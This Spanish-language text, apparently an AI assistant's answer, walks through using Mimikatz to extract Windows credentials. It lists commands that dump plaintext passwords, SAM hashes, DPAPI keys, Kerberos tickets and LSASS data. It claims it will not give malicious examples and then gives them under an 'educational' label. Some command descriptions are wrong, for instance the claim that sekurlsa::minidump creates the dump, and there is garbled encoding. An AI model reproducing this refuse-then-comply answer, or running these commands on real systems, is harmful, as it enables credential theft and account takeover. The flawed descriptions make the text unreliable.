"Mimikatz" es una herramienta que se ha utilizado históricamente para extraer credenciales y contraseñas almacenadas en sistemas Windows. Aunque originalmente fue creado para demostrar vulnerabilidades en la seguridad de Windows, también se ha utilizado con fines maliciosos. Como resultado, es importante recordar que el uso indebido de esta herramienta puede ser ilegal y violar la privacidad y la seguridad de los sistemas.
Dado que el uso de Mimikatz conlleva riesgos legales y éticos, no puedo proporcionarte ejemplos detallados de cómo usar la herramienta en cuestiones maliciosas. Sin embargo, puedo proporcionarte un ejemplo educativo que muestra cómo se utiliza Mimikatz para extraer contraseñas almacenadas en un sistema Windows. Recuerda que este ejemplo debe usarse solo con fines educativos y éticos, y no para actividades maliciosas.
Supongamos que tienes acceso legÃtimo a un sistema Windows y deseas demostrar cómo Mimikatz podrÃa extraer contraseñas:
Descargar Mimikatz: Descarga la última versión de Mimikatz desde su repositorio oficial o de una fuente confiable.
Abrir una lÃnea de comandos con privilegios de administrador: Ejecuta la lÃnea de comandos como administrador.
Cargar el módulo de Mimikatz: Ejecuta el siguiente comando en la lÃnea de comandos para cargar el módulo de Mimikatz en la memoria del sistema:
mimikatz # privilege::debug
4. Listar las credenciales almacenadas: Ejecuta el siguiente comando para listar las credenciales almacenadas en el sistema:
mimikatz # sekurlsa::logonpasswords
Este comando mostrará las credenciales almacenadas en el sistema, incluyendo nombres de usuario y contraseñas en texto plano o en formato de hash.
5. Extraer contraseñas en texto claro:
mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" "exit"
Este comando ejecutará Mimikatz y tratará de obtener contraseñas en texto claro de las sesiones de inicio de sesión actuales.
6. Extraer hashes de contraseñas:
mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
Este comando intentará extraer hashes de contraseñas almacenados en la base de datos SAM de Windows.7. Extraer claves de cifrado DPAPI:
mimikatz.exe "privilege::debug" "dpapi::cache" "exit"
Con este comando, se extraen claves de cifrado almacenadas en la caché de protección de datos (DPAPI) de Windows.
8. Exportar hashes de contraseñas a un archivo:
mimikatz.exe "privilege::debug" "lsadump::sam" "log" "exit"
Agregando
"log"
después de las instrucciones, Mimikatz exportará los resultados al archivomimikatz.log
en el mismo directorio.9. Ejecutar comandos después de la extracción:
mimikatz.exe "privilege::debug" "lsadump::sam" "token::elevate" "sekurlsa::logonPasswords" "exit"
Puedes ejecutar varios comandos de Mimikatz en secuencia utilizando esta sintaxis.
10. Extraer información sobre tickets Kerberos:
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
Este comando extraerá información sobre los tickets Kerberos almacenados en el sistema.
11. Obtener información sobre credenciales almacenadas en LSASS:
mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
Con este comando, primero se crea un volcado minidump de LSASS y luego se intenta extraer las contraseñas de inicio de sesión.
Recuerda que este ejemplo se proporciona únicamente con fines educativos y para aumentar la conciencia sobre las vulnerabilidades de seguridad que Mimikatz puede explotar. El uso indebido de esta herramienta para obtener acceso no autorizado a sistemas o robar información personal es ilegal y perjudicial. Siempre actúa de manera ética y cumple con las leyes y regulaciones aplicables.